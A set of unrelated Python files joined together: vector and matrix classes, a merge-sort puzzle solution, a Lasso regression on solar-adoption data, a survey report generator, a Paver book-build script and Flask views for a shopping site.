def __getitem__( self, item ):
item = min( max( item, 0 ), self.size )
return (self.x,self.y,self.z,self.w)[item]
def __setitem__( self, item, value ):
item = min( max( item, 0 ), self.size )
setattr( self, ('x','y','z','w')[item], value )
@classmethod
def Zero( cls, size=4 ):
return cls( *((0,)*size) )
@classmethod
def Random( cls, size=4 ):
import random
list = []
for n in range(size):
list.append( random.random() )
return cls( *list )
def copy( self ):
return self.__class__( *self.as_tuple() )
def dot( self, other ):
dot = self.x*other.x + self.y*other.y + self.z*other.z
if self._is4Vec: dot += self.w*other.w
return dot
def __rxor__( self, other ):
#used for cross product - called using a**b
#NOTE: the cross product isn't defined for a 4 vector - so it always ignores the w
x = self.y*other.z - self.z*other.y
y = self.z*other.x - self.x*other.z
z = self.x*other.y - self.y*other.x
return self.__class__(x,y,z)
cross = __rxor__
def __is4Vec( self ):
if self.w != None: return True
return False
_is4Vec = property(__is4Vec)
def get_size( self ):
if self.w != None: return 4
return 3
size = property(get_size)
def get_magnitude( self ):
if self._is4Vec: return math.sqrt(self.x**2 + self.y**2 + self.z**2 + self.w**2)
return math.sqrt(self.x**2 + self.y**2 + self.z**2)
def set_magnitude( self, factor ):
factor /= self.length
self.x *= factor
self.y *= factor
self.z *= factor
if self._is4Vec: self.w *= factor
magnitude = property(get_magnitude,set_magnitude)
mag = property(get_magnitude,set_magnitude)
length = property(get_magnitude,set_magnitude)
def normalize( self ):
'''normalizes the vector in place'''
len = self.length
self.x /= len
self.y /= len
self.z /= len
if self._is4Vec: self.w /= len
def as_tuple( self ):
if self._is4Vec: return (self.x,self.y,self.z,self.w)
return (self.x,self.y,self.z)
def as_list( self ):
return list( self.as_tuple() )
def change_space( self, basisX, basisY, basisZ=None ):
'''will re-parameterize this vector to a different space
NOTE: the basisZ is optional - if not given, then it will be computed from X and Y
NOTE: changing space isn't supported for 4-vectors'''
if basisZ == None:
basisZ = basisX ^ basisY
basisZ.normalize()
newX = self.dot(basisX)
newY = self.dot(basisY)
newZ = self.dot(basisZ)
self.x,self.y,self.z = newX,newY,newZ
self.w = None
def complex(self):
return self.__class__( [ complex(v) for v in self.as_tuple() ] )
def conjugate(self):
return self.__class__( [ v.conjugate() for v in self.complex().as_tuple() ] )
class Matrix(object):
'''deals with square matricies'''
#__slots__ = ('size','rows') #slots are commented out because they seem to be slightly slower than the standard __dict__ attributes
def __init__( self, values=(), size=4 ):
if len(values) > size*size:
raise MatrixException('too many args: the size of the matrix is %d and %d values were given'%(size,len(values)))
self.size = size
self.rows = []
for n in range(size):
row = [0]*size
row[n] = 1
self.rows.append(row)
for n in range(len(values)):
self.rows[n/size][n%size] = values[n]
def __repr__( self ):
asStr = ''
for i in range(self.size):
asStr += str( self[i] ) +'\n'
return asStr
def __str__( self ):
return self.__repr__()
def __add__( self, other ):
new = self.__class__.Zero(self.size)
for i in range(self.size):
for j in range(self.size):
new[i][j] = self[i][j] + other[i][j]
return new
def __sub__( self, other ):
new = self.__class__.Zero(self.size)
new = self + (other*-1)
return new
def __mul__( self, other ):
new = None
if isinstance( other, (float,int) ):
new = self.__class__.Zero(self.size)
for i in range(self.size):
for j in range(self.size):
new[i][j] = self[i][j] * other
elif isinstance( other, Vector ):
new = Vector()
for i in range(self.size):
#vector indicies
for j in range(4):
#matrix indicies
new[i] += other[j] * self[i][j]
else:
new = self.__class__.Zero(self.size)
for i in range(self.size):
for j in range(self.size):
new[i][j] = Vector( *self.getRow(i) ) * Vector( *other.getCol(j) )
return new
def __div__( self, other ):
return self.__mul__(1.0/other)
def __getitem__( self, item ):
'''matrix is indexed as: self[row][column]'''
return self.rows[item]
def __setitem__( self, item, newRow ):
if len(newRow) != self.size: raise MatrixException( 'row length not of correct size' )
self.rows[item] = newRow
def __eq__( self, other ):
return self.isEqual(other)
def __ne__( self, other ):
return not self.isEqual(other)
def isEqual( self, other, tolerance=1e-5 ):
if self.size != other.size:
return False
for i in range(self.size):
for j in range(self.size):
if abs( self[i][j] - other[i][j] ) > tolerance:
return False
return True
@classmethod
def Zero( cls, size=4 ):
new = cls([0]*size*size,size)
return new
@classmethod
def Identity( cls, size=4 ):
rows = [0]*size*size
for n in range(size):
rows[n+(n*size)] = 1
return cls(rows,size)
@classmethod
def Random( cls, size=4 ):
rows = []
import random
for n in range(size*size):
#rows.append(random.random())
rows.append(random.randint(0,10))
return cls(rows,size)
def getRow( self, row ):
return self.rows[row]
def setRow( self, row, newRow ):
if len(newRow) > self.size: newRow = newRow[:self.size]
if len(newRow) < self.size:
newRow.extend( [0] * (self.size-len(newRow)) )
self.rows = newRow
return newRow
def getCol( self, col ):
column = [0]*self.size
for n in range(self.size):
column[n] = self.rows[n][col]
return column
def setCol( self, col, newCol ):
newColActual = []
for n in range(min(self.size,len(newCol))):
self.rows[n] = newCol[n]
newColActual.append(newCol[n])
return newColActual
def swapRow( self, nRowA, nRowB ):
rowA = self.getRow(nRowA)
rowB = self.getRow(nRowB)
tmp = rowA
self.setRow(nRowA,rowB)
self.setRow(nRowB,tmp)
def swapCol( self, nColA, nColB ):
colA = self.getCol(nColA)
colB = self.getCol(nColB)
tmp = colA
self.setCol(nColA,colB)
self.setCol(nColB,tmp)
def transpose( self ):
new = self.__class__.Zero(self.size)
for i in range(self.size):
for j in range(self.size):
new[i][j] = self[j][i]
return new
def transpose3by3( self ):
new = self.copy()
for i in range(3):
for j in range(3):
new[i][j] = self[j][i]
return new
def copy( self ):
rows = []
for n in range(self.size):
rows += self[n]
return self.__class__( rows, self.size )
def det( self ):
'''calculates the determinant for an arbitrarily sized square matrix'''
d = 0
if self.size <= 0: return 1
for i in range(self.size):
sign = (1,-1)[ i % 2 ]
cofactor = self.cofactor(i,0)
d += sign * self[i][0] * cofactor.det()
return d
determinant = det
def cofactor( self, aI, aJ ):
cf = self.__class__(size=self.size-1)
cfi = 0
for i in range(self.size):
if i == aI: continue
cfj = 0
for j in range(self.size):
if j == aJ: continue
cf[cfi][cfj] = self[i][j]
cfj += 1
cfi += 1
return cf
minor = cofactor
def isSingular( self ):
det = self.det()
if abs(det) < 1e-6: return True,0
return False,det
def isRotation( self ):
'''rotation matricies have a determinant of 1'''
if abs(self.det()) - 1 < 1e-6: return True
return False
def inverse( self ):
'''Each element of the inverse is the determinant of its minor
divided by the determinant of the whole'''
isSingular,det = self.isSingular()
if isSingular: return self.copy()
new = self.__class__.Zero(self.size)
for i in range(self.size):
for j in range(self.size):
sign = (1,-1)[ (i+j) % 2 ]
new[i][j] = sign * self.cofactor(i,j).det()
new /= det
return new.transpose()
def as_list( self ):
list = []
for i in range(self.size):
list.extend(self[i])
return list
def as_tuple( self ):
return tuple( self.as_list() )
def test():
#create some random matricies and make sure things are working
import time
time.clock()
def inverseTest( size, numIts=10 ):
identity = Matrix.Identity(size)
for n in range(numIts):
testMatA = Matrix.Random(size)
testMatAInv = testMatA.inverse()
mult = testMatA*testMatAInv
if not mult.isEqual(identity,0.001):
assert isinstance(mult,Matrix)
if not mult.isSingular():
print 'failed to calculate inverse for matrix of size',size
print mult
inverseTest(2)
inverseTest(3)
inverseTest(4,250)
#for n in range(20000):
#a=Matrix.Random()
#b=a.as_tuple()
#len(b)
secs = time.clock()
print 'seconds taken',secs
#test()
#end |
class Solution:
def sortColors(self, nums: List[int]) -> None:
"""
Algorithm : merge-sort (divide and conqure)
"""
if len(nums) >1:
mid = len(nums)//2
L = nums[:mid]
R = nums[mid:]
self.sortColors(L)
self.sortColors(R)
i = j = k = 0
while i < len(L) and j < len(R):
if L[i] < R[j]:
nums[k] = L[i]
i += 1
else:
nums[k] = R[j]
j += 1
k += 1
while i < len(L):
nums[k] = L[i]
i += 1
k += 1
while j < len(R):
nums[k] = R[j]
j += 1
k += 1
# driver code
nums = [2,0,2,1,1,0]
# o/p = [0,0,1,1,2,2]
if __name__ == "__main__":
myObj = Solution()
myObj.sortColors()
print(nums)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 1 12:42:31 2019
@author: rebeccafang
"""
""" This program applies a linear regression model with L1 regularization to
the cleaned DeepSolar dataset. This model predicts residential solar system
count per 1000 households.
"""
import matplotlib.pyplot as plt
import math
import numpy as np
import pandas as pd
import seaborn as sns
import sklearn
from sklearn import linear_model
from sklearn.feature_selection import f_regression
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn import preprocessing
import sys
training_set_raw = pd.read_csv('solar_training_set.csv', delimiter = ',')
training_set_raw.drop(['Unnamed: 0','Unnamed: 0.1'], axis=1, inplace=True)
training_set_raw.drop(['race_asian','race_black_africa','race_indian_alaska','race_islander','race_other','race_two_more','race_white','total_area','unemployed','water_area','population','land_area','employed'], axis=1, inplace=True)
training_set_raw.drop(['education_bachelor','education_college','education_doctoral','education_high_school_graduate','education_less_than_high_school','education_master','education_population','education_professional_school'], axis=1, inplace=True)
training_set_raw.drop(['poverty_family_below_poverty_level','poverty_family_count','household_count','housing_unit_count','housing_unit_occupied_count','electricity_consume_residential'], axis=1, inplace=True)
val_set_raw = pd.read_csv('solar_val_set.csv', delimiter = ',')
val_set_raw.drop(['Unnamed: 0','Unnamed: 0.1'], axis=1, inplace=True)
val_set_raw.drop(['race_asian','race_black_africa','race_indian_alaska','race_islander','race_other','race_two_more','race_white','total_area','unemployed','water_area','population','land_area','employed'], axis=1, inplace=True)
val_set_raw.drop(['education_bachelor','education_college','education_doctoral','education_high_school_graduate','education_less_than_high_school','education_master','education_population','education_professional_school'], axis=1, inplace=True)
val_set_raw.drop(['poverty_family_below_poverty_level','poverty_family_count','household_count','housing_unit_count','housing_unit_occupied_count','electricity_consume_residential'], axis=1, inplace=True)
test_set_raw = pd.read_csv('solar_test_set.csv', delimiter = ',')
test_set_raw.drop(['Unnamed: 0','Unnamed: 0.1'], axis=1, inplace=True)
test_set_raw.drop(['race_asian','race_black_africa','race_indian_alaska','race_islander','race_other','race_two_more','race_white','total_area','unemployed','water_area','population','land_area','employed'], axis=1, inplace=True)
test_set_raw.drop(['education_bachelor','education_college','education_doctoral','education_high_school_graduate','education_less_than_high_school','education_master','education_population','education_professional_school'], axis=1, inplace=True)
test_set_raw.drop(['poverty_family_below_poverty_level','poverty_family_count','household_count','housing_unit_count','housing_unit_occupied_count','electricity_consume_residential'], axis=1, inplace=True)
y_train_raw = training_set_raw['number_solar_system_per_1000_household']
print('y_train', y_train_raw[:10])
print('mean',np.mean(y_train_raw))
print('std dev',np.std(y_train_raw))
print('variance',np.var(y_train_raw))
print('min value',np.min(y_train_raw))
print('max value',np.max(y_train_raw))
# Plot distribution of y_train values (number of solar systems per 1,000 households)
plt.hist(y_train_raw,500)
plt.xlim(0, 600)
plt.yscale('log')
plt.xlabel('Number of Solar Systems per 1,000 Households')
plt.ylabel('Number of Data Examples')
plt.title('Distribution of Training Data')
#plt.savefig('training_data_hist.eps', format='eps', dpi=1000)
plt.show()
# Data preprocessing
le = preprocessing.LabelEncoder()
for column_name in training_set_raw.columns:
if training_set_raw[column_name].dtype == object:
training_set_raw[column_name] = le.fit_transform(training_set_raw[column_name])
else:
pass
for column_name in val_set_raw.columns:
if val_set_raw[column_name].dtype == object:
val_set_raw[column_name] = le.fit_transform(val_set_raw[column_name])
else:
pass
for column_name in test_set_raw.columns:
if test_set_raw[column_name].dtype == object:
test_set_raw[column_name] = le.fit_transform(test_set_raw[column_name])
else:
pass
# Normalize data
training_set = training_set_raw.values
min_max_scaler = preprocessing.MinMaxScaler()
training_set = min_max_scaler.fit_transform(training_set)
training_set = pd.DataFrame(training_set, columns = training_set_raw.columns)
val_set = val_set_raw.values
val_set = min_max_scaler.fit_transform(val_set)
val_set = pd.DataFrame(val_set, columns = val_set_raw.columns)
test_set = test_set_raw.values
test_set = min_max_scaler.fit_transform(test_set)
test_set = pd.DataFrame(test_set, columns = test_set_raw.columns)
y_train = training_set[['number_solar_system_per_1000_household']]
training_set.drop('number_solar_system_per_1000_household', axis=1, inplace=True) # Remove y column
X_train = training_set
y_val = val_set[['number_solar_system_per_1000_household']]
val_set.drop('number_solar_system_per_1000_household', axis=1, inplace=True) # Remove y column
X_val = val_set
y_test = test_set[['number_solar_system_per_1000_household']]
test_set.drop('number_solar_system_per_1000_household', axis=1, inplace=True) # Remove y column
X_test = test_set
# Loop through alpha values: 1e-5, 1e03, 1e-1, 1e1, 1e2, find alpha that gives lowest MAE
alpha_lst = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 10, 100]
mae_lst = [] # List of mean absolute errors for the alphas
coefs_lst = [] # List of coefficients arrays for alpha values
loss_lst = [] # List of loss values for alpha values
for a in alpha_lst:
mod = linear_model.Lasso(alpha = a, fit_intercept=True, max_iter=20000)
mod.fit(X_train, y_train)
y_pred_temp = mod.predict(X_val) # Predict residential solar system density on validation set
y_val_temp = y_val.values # Convert dataframe to numpy array
y_pred_temp = np.expand_dims(y_pred_temp,1) # Expand dimensions to match y_val
mae_temp = mean_absolute_error(y_val_temp, y_pred_temp)
mae_lst.append(mae_temp)
loss_temp = mae_temp * len(y_val_temp)
loss_lst.append(loss_temp)
coefs_lst.append(mod.coef_)
# Find alpha that gives lowest mae
alph = alpha_lst[mae_lst.index(min(mae_lst))]
# Create and train linear regression model with L1 regularization on training set
model = linear_model.Lasso(alpha = alph, fit_intercept=True, max_iter=20000)
model.fit(X_train, y_train)
y_pred = model.predict(X_val) # Predict residential solar system density on validation set
y_val = y_val.values # Convert dataframe to numpy array
y_pred = np.expand_dims(y_pred,1) # Expand dimensions to match y_val
X_train_lst = [X_train[0:2000],X_train[0:4000],X_train[0:6000],X_train[0:8000],X_train[0:10000],X_train[0:12000],X_train[0:14000],X_train[0:16000],X_train[0:18000],X_train[0:20000],X_train[0:22000],X_train[0:24000],X_train[0:26000],X_train[0:28000],X_train[0:30000],X_train[0:32000],X_train[0:34000],X_train[0:36000], X_train[0:38000],X_train[0:40000],X_train[0:42000], X_train]
y_train_lst = [y_train[0:2000],y_train[0:4000],y_train[0:6000],y_train[0:8000],y_train[0:10000],y_train[0:12000],y_train[0:14000],y_train[0:16000],y_train[0:18000],y_train[0:20000],y_train[0:22000],y_train[0:24000],y_train[0:26000],y_train[0:28000],y_train[0:30000],y_train[0:32000],y_train[0:34000],y_train[0:36000], y_train[0:38000],y_train[0:40000],y_train[0:42000], y_train]
J_train_lst = []
J_val_lst = []
# Loop over various training set sizes
for i in range(0,len(X_train_lst)):
X_learn = X_train_lst[i]
y_learn = y_train_lst[i]
mod_learn = linear_model.Lasso(alpha = alph, fit_intercept=True, max_iter=20000)
mod_learn.fit(X_learn, y_learn)
y_pred_val = mod_learn.predict(X_val)
y_pred_val = np.expand_dims(y_pred_val,1)
mae_val = mean_absolute_error(y_val, y_pred_val)
mse_val = mean_squared_error(y_val, y_pred_val)
J_val = mae_val * len(y_val) # Validation error
J_val_lst.append(mae_val)
y_pred_train = mod_learn.predict(X_learn)
y_pred_train = np.expand_dims(y_pred_train,1)
mae_train = mean_absolute_error(y_learn, y_pred_train)
mse_train = mean_squared_error(y_learn, y_pred_train)
J_train = mae_train * len(y_learn) # Training error
J_train_lst.append(mae_train)
# Identify features with coefficients equal to zero
headers = np.array(X_train.columns.values) # List of column header names
coefs = model.coef_
zeros = np.where(coefs==0)[0]
nonzeros = np.where(coefs!=0)[0]
num_nonzero = np.count_nonzero(coefs) # Number of nonzero coefficients
zero_lst = []
for ind in zeros:
zero_lst.append(headers[ind])
nonzero_lst = []
for ind in nonzeros:
nonzero_lst.append((headers[ind], abs(coefs[ind])))
# Rank nonzero coef features based on absolute value of coefs
nonzero_lst = sorted(nonzero_lst, key=lambda x: x[1])
# Run trained model on training set
y_pred_training = model.predict(X_train)
# Run trained model on test set
y_pred_test = model.predict(X_test)
## Print coefficients for train
#print('Coefficients: \n', model.coef_)
## Print the mean absolute error
#print('Mean absolute error: %.2f' % mean_absolute_error(y_train, y_pred_training))
## Print the mean squared error
#print('Mean squared error: %.2f' % mean_squared_error(y_train, y_pred_training))
## Print the root mean squared error
#print('Root mean squared error: %.2f' % math.sqrt(mean_squared_error(y_train, y_pred_training)))
## Print variance score, where 1 = perfect prediction
#print('Variance score: %.2f' % r2_score(y_train, y_pred_training))
# Print coefficients for test
print('Coefficients: \n', model.coef_)
# Print the mean absolute error
print('Mean absolute error: %.2f' % mean_absolute_error(y_test, y_pred_test))
# Print the mean squared error
print('Mean squared error: %.2f' % mean_squared_error(y_test, y_pred_test))
# Print the root mean squared error
print('Root mean squared error: %.2f' % math.sqrt(mean_squared_error(y_test, y_pred_test)))
# Print variance score, where 1 = perfect prediction
print('Variance score: %.2f' % r2_score(y_test, y_pred_test))
## Print coefficients for validation
#print('Coefficients: \n', model.coef_)
## Print the mean absolute error
#print('Mean absolute error: %.2f' % mean_absolute_error(y_val, y_pred))
## Print the mean squared error
#print('Mean squared error: %.2f' % mean_squared_error(y_val, y_pred))
## Print the root mean squared error
#print('Root mean squared error: %.2f' % math.sqrt(mean_squared_error(y_val, y_pred)))
## Print variance score, where 1 = perfect prediction
#print('Variance score: %.2f' % r2_score(y_val, y_pred))
#loss1 = np.sum(np.absolute(y_pred - y_val))
#loss2 = mae * len(y_val)
#assert loss1 - loss2 <= 0.0001
# Plot coefficients vs. alphas
plt.plot(alpha_lst, coefs_lst)
plt.xscale('log')
plt.xlabel('alpha')
plt.ylabel('Coefficients')
plt.title('Lasso coefficients as a function of the learning rate')
#plt.savefig('L1_coefs_alpha.eps', format='eps', dpi=1000)
plt.show()
# Plot loss vs. alphas
plt.plot(alpha_lst, loss_lst)
plt.xscale('log')
plt.xlabel('alpha')
plt.ylabel('Loss')
plt.title('Loss as a function of the learning rate (L1 Regularization)')
#plt.savefig('L1_loss_alpha.eps', format='eps', dpi=1000)
plt.show()
# Plot learning curves
X_train_num = []
for i in range(0,len(X_train_lst)):
X_train_num.append(len(X_train_lst[i]))
plt.plot(X_train_num, J_train_lst)
plt.plot(X_train_num, J_val_lst)
plt.legend(["Training Error", "Validation Error"], loc='best')
plt.xlabel('Training examples')
plt.ylabel('Mean Absolute Error')
plt.title('Learning Curves for L1 Regularization')
#plt.savefig('L1_learning_curve.eps', format='eps', dpi=1000)
plt.show()
# Plot histogram of test error
y_test = y_test.values
y_pred_test = np.expand_dims(y_pred_test,1)
test_error = y_test - y_pred_test
plt.hist(test_error,500)
plt.xlim(-0.1, 0.2)
plt.xlabel('Error')
plt.ylabel('Number of Test Examples')
plt.title('Histogram of Test Error (L1 Regularization)')
#plt.savefig('L1_test_error_hist.eps', format='eps', dpi=1000)
plt.show()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import math
import pandas as pd
import numpy as np
from optparse import OptionParser
from xlsxwriter.utility import xl_rowcol_to_cell
class Report:
def __init__(self, filename):
self.all_top_box = None
self.all_average = None
self.split_reports_by = u'custom_3'
self.likert_names = ["SD", "D", "N", "A", "SA"]
df = pd.read_excel(filename)
self.df = self.drop_unwanted_columns(df, keep=[self.split_reports_by])
questions, question_key_list = self.get_questions_in_order()
def drop_unwanted_columns(self, df, keep=[]):
# The SurveyMonkey report might have unwanted rows
for column_name in df.columns.tolist():
if column_name in keep:
continue
if df[column_name][0] != "Response":
df = df.drop(columns=[column_name])
return df
def get_questions_in_order(self, key_prefix = 'F%2i'):
# SurveyMonkey adds the key word "Response"
ret = {}
key_list = []
index = 0
for column_name in self.df.columns.tolist():
if self.df[column_name][0] == "Response":
index = index + 1
ret[key_prefix % index] = column_name
key_list.append(key_prefix % index)
self.questions = ret
self.question_key_list = key_list
return ret, key_list
def report_total(self):
report_name = "ALL"
print("Processing Report: %s" % report_name)
df = self.df.copy(deep=True)
df = df.drop(columns=[self.split_reports_by])
df = pd.DataFrame(df.stack())
df = pd.DataFrame(df.unstack(0))
df = df.drop(columns=[(0,0)])
self.generate_report(df, report_name)
def report(self):
for report_name in self.df[self.split_reports_by].unique():
# filter garbage out
if type(report_name) != str:
continue
print("Processing Report: %s" % report_name)
df = self.df.copy(deep=True)
df = df[df[self.split_reports_by] == report_name]
df = df.drop(columns=[self.split_reports_by])
df = pd.DataFrame(df.stack())
df = pd.DataFrame(df.unstack(0))
self.generate_report(df, report_name)
def write_xlsx(self, df, name):
"""
Make a shiny XLSX
"""
# Add full question texts
for key in self.questions:
df.loc[key,'Q'] = self.questions[key]
# Swap question with question-key
col_index = ['Q', 'SD','D', 'N','A', 'SA', 'CNT', 'AVG', "CAV", "BOX", "CBO" ] #
df = df.reindex(col_index, axis=1)
# Numan readable column names
df = df.rename(columns={
"SD": "-2",
"D": "-1",
"N": "0",
"A": "+1",
"SA": "+2",
"CNT": "Anzahl:",
"AVG": name,
"CAV": "Company",
"BOX": name + "Top Box",
"CBO": "Company Top Box",
"Q": "Frage"
})
# open the XLSX writer
writer = pd.ExcelWriter(name + '.xlsx', engine='xlsxwriter')
sheet = "Report"
# add data frame to sheet
df.to_excel(writer, sheet)
# define and set number formats
workbook = writer.book
worksheet = writer.sheets[sheet]
# set default cell format
workbook.formats[0].set_font_size(10)
workbook.formats[0].set_font_name('Arial')
# https://xlsxwriter.readthedocs.io/format.html
format1 = workbook.add_format({'num_format': '#,##0.00'})
format2 = workbook.add_format({'num_format': '0%'})
format3 = workbook.add_format({'bg_color' : '008046',
'font_color': 'ffffff'})
format4 = workbook.add_format({'bg_color' : 'F79646'})
fromat5 = workbook.add_format({'rotation' : 90,
'bg_color' : 'F2F2F2' })
# set column formats based on index
worksheet.set_row (0, 20, cell_format = fromat5)
worksheet.set_column(col_index.index('AVG') + 1,
col_index.index('CAV') + 1,
width = 10, cell_format = format1)
worksheet.set_column(col_index.index('BOX') + 1,
col_index.index('CBO') + 1,
width = 10, cell_format = format2)
# add conditional formats
# https://xlsxwriter.readthedocs.io/working_with_conditional_formats.html
compare_to = xl_rowcol_to_cell(1, col_index.index('CBO') + 1,
col_abs = True)
col = col_index.index('BOX') + 1
worksheet.conditional_format(1, col, 30, col,{'type': 'cell',
'criteria': '>=',
'value': f'{compare_to}+0.15',
'format': format3
})
worksheet.conditional_format(1, col, 30, col, {'type': 'cell',
'criteria': '<=',
'value': f'{compare_to}-0.15',
'format': format4
})
# final save
writer.save()
def generate_report(self, df, name):
g_fnc = lambda x,y: x.loc[y] if y in x.index else 0
columns_names = ["SD", "D", "N", "A", "SA"]
# Count all values by column name
for key in self.question_key_list:
for i in range(1, len(columns_names) + 1):
counts = g_fnc (df.loc[self.questions[key],0].value_counts(), i)
df.loc[self.questions[key], columns_names[i-1]] = int(counts)
# Calulate Averages and add new columns CNT and AVG
for key in self.question_key_list:
total = df.loc[self.questions[key],[0]].sum()
count = df.loc[self.questions[key],["SD", "D", "N", "A", "SA"]].sum()
df.loc[self.questions[key], "XXCNT"] = count
df.loc[self.questions[key], "XXAVG"] = total / count
# Delete the raw survey data
df.drop(0, axis=1, inplace=True)
for key in self.questions:
df.loc[self.questions[key],'ID'] = key
df = df.set_index('ID')
for key in self.question_key_list:
topbox = [0, 0, 0, 1, 1]
botbox = [1, 1, 1, 0, 0]
scores = [1, 2, 3, 4, 5]
weights = [2, 1, 0, 1, 2]
respons = df.loc[key,columns_names]
topvalue = (respons * topbox).sum()
botvalue = (respons * botbox).sum()
df.loc[key, "CNT"] = respons.sum()
df.loc[key, "AVG"] = (respons * scores).sum() / respons.sum()
if ((respons * weights).sum() > 0):
df.loc[key, "AVGW"] = (respons * weights * scores).sum() / (respons * weights).sum()
else:
df.loc[key, "AVGW"] = 0
df.loc[key, "BOX"] = (1 / (topvalue + botvalue) * topvalue)
if name == 'ALL':
self.all_top_box = df.loc[:,"BOX"]
self.all_average = df.loc[:,"AVG"]
df['CAV'] = self.all_average
df['CBO'] = self.all_top_box
df[columns_names] = df[["SD", "D", "N", "A", "SA"]].fillna(0.0).astype(int)
df.columns = df.columns.droplevel(level=1)
self.write_xlsx(df, name)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default="False",
help="Verbose prints enabled")
parser.add_option("-f", "--file", dest="filename",
help="write report to FILE", metavar="FILE")
(options, args) = parser.parse_args()
r = Report(options.filename)
r.report_total()
r.report()
|
import paver
import paver.misctasks
from paver.path import path
from paver.easy import *
import paver.setuputils
paver.setuputils.install_distutils_tasks()
import os, sys
from sphinxcontrib import paverutils
sys.path.append(os.getcwd())
# You will want to change these for your own environment in .gitignored paverconfig.py
try:
from paverconfig import master_url, master_app
except:
print 'NOTICE: You are using default values for master_* Make your own paverconfig.py file'
master_url = 'http://127.0.0.1:8000'
master_app = 'runestone'
options(
sphinx = Bunch(
docroot=".",
),
everyday = Bunch(
outdir="static/everyday",
sourcedir="everyday",
builddir="static/everyday",
confidir="everyday",
template_args={'course_id':'everyday',
'login_required':'false',
'appname':master_app,
'loglevel':10,
'course_url':master_url }
),
thinkcspy = Bunch(
builddir="static/thinkcspy",
sourcedir="source",
outdir="static/thinkcspy",
confdir="thinkcspy",
template_args={'course_id':'thinkcspy',
'login_required':'false',
'appname':master_app,
'loglevel':10,
'course_url':master_url }
),
pythonds = Bunch(
builddir="static/pythonds",
sourcedir="source",
outdir="static/pythonds",
confdir="pythonds",
template_args={'course_id':'pythonds',
'login_required':'false',
'appname':master_app,
'loglevel':10,
'course_url':master_url }
),
overview = Bunch(
builddir="static/overview",
sourcedir="overview",
outdir="static/overview",
confdir="overview",
template_args={'course_id':'overview',
'login_required':'false',
'appname':master_app,
'loglevel':10,
'course_url':master_url }
),
devcourse = Bunch(
builddir="static/devcourse",
sourcedir="source",
outdir="static/devcourse",
confdir="devcourse",
template_args={'course_id':'devcourse',
'login_required':'true',
'appname':master_app,
'loglevel':10,
'course_url':master_url }
)
)
@task
@cmdopts([('all','a','rebuild everything')])
def everyday(options):
if 'all' in options.everyday:
options['force_all'] = True
options['freshenv'] = True
paverutils.run_sphinx(options,'everyday')
@task
@cmdopts([('all','a','rebuild everything')])
def thinkcspy(options):
sh('cp %s/index.rst %s' % (options.thinkcspy.confdir,options.thinkcspy.sourcedir))
if 'all' in options.thinkcspy:
options['force_all'] = True
options['freshenv'] = True
paverutils.run_sphinx(options,'thinkcspy')
@task
@cmdopts([('all','a','rebuild everything')])
def pythonds(options):
sh('cp %s/index.rst %s' % (options.pythonds.confdir,options.pythonds.sourcedir))
if 'all' in options.pythonds:
options['force_all'] = True
options['freshenv'] = True
paverutils.run_sphinx(options,'pythonds')
@task
@cmdopts([('all','a','rebuild everything')])
def overview(options):
if 'all' in options.overview:
options['force_all'] = True
options['freshenv'] = True
paverutils.run_sphinx(options,'overview')
@task
@cmdopts([('all','a','rebuild everything')])
def devcourse(options):
sh('cp %s/index.rst %s' % (options.devcourse.confdir,options.devcourse.sourcedir))
if 'all' in options.devcourse:
options['force_all'] = True
options['freshenv'] = True
paverutils.run_sphinx(options,'devcourse')
@task
@cmdopts([('all','a','rebuild everything')])
def allbooks(options):
if 'all' in options.allbooks:
options.thinkcspy['all'] = True
options.pythonds['all'] = True
options.overview['all'] = True
options.devcourse['all'] = True
thinkcspy(options)
pythonds(options)
devcourse(options)
overview(options)
|
import os
import secrets
from PIL import Image
from sqlalchemy.sql.functions import user
from shopping import app,db,bcrypt
from flask import render_template, url_for, flash, redirect,request, session
from shopping.forms import ContactForm, RegistrationForm,LoginForm, UpdateProfileForm
from shopping.models import User,Contact,Category, SubCategory,Product
from flask_login import login_user, current_user, logout_user, login_required
from sqlalchemy import insert,update,delete
import re
class footer():
def footer():
contact= ContactForm()
if request.method =='POST':
name = request.form['name']
email = request.form['email']
phone = request.form['phone']
message = request.form['message']
query=Contact(username=name, email=email,phone=phone, message=message)
db.session.add(query)
db.session.commit()
msg = "We go t your query, we'll revert to u back soon.."
return contact
@app.route('/home',methods=['GET', 'POST'])
def home():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('home'))
return render_template('home.html',form=form)
@app.route('/login',methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Login Unsuccessful. Please check email and password', 'danger')
return render_template('login.html', title='Login', form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(username=form.username.data, email=form.email.data,phone=form.phone.data, password=hashed_password)
db.session.add(user)
db.session.commit()
flash('Your account has been created! You are now able to log in', 'success')
return redirect(url_for('login'))
return render_template('register.html', title='Register', form=form)
@app.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
form = UpdateProfileForm()
if form.validate_on_submit():
if form.picture.data:
picture_file = save_picture(form.picture.data)
current_user.image_file = picture_file
current_user.username = form.username.data
current_user.email = form.email.data
current_user.phone = form.phone.data
user = User.query.filter_by(email=current_user.email).first()
if current_user and bcrypt.check_password_hash(user.password, form.password.data):
db.session.commit()
flash('Your account has been updated!', 'success')
return redirect(url_for('profile'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
form.phone.data = current_user.phone
image_file = url_for('static', filename='images/profile_pics/' + current_user.image_file)
return render_template('profile.html', title='Account',
image_file=image_file, form=form)
def save_picture(form_picture):
random_hex = secrets.token_hex(8)
_, f_ext = os.path.splitext(form_picture.filename)
picture_fn = random_hex + f_ext
picture_path = os.path.join(app.root_path, 'static/images/profile_pics', picture_fn)
output_size = (125, 125)
i = Image.open(form_picture)
i.thumbnail(output_size)
i.save(picture_path)
return picture_fn
@app.route("/logout")
@login_required
def logout():
logout_user()
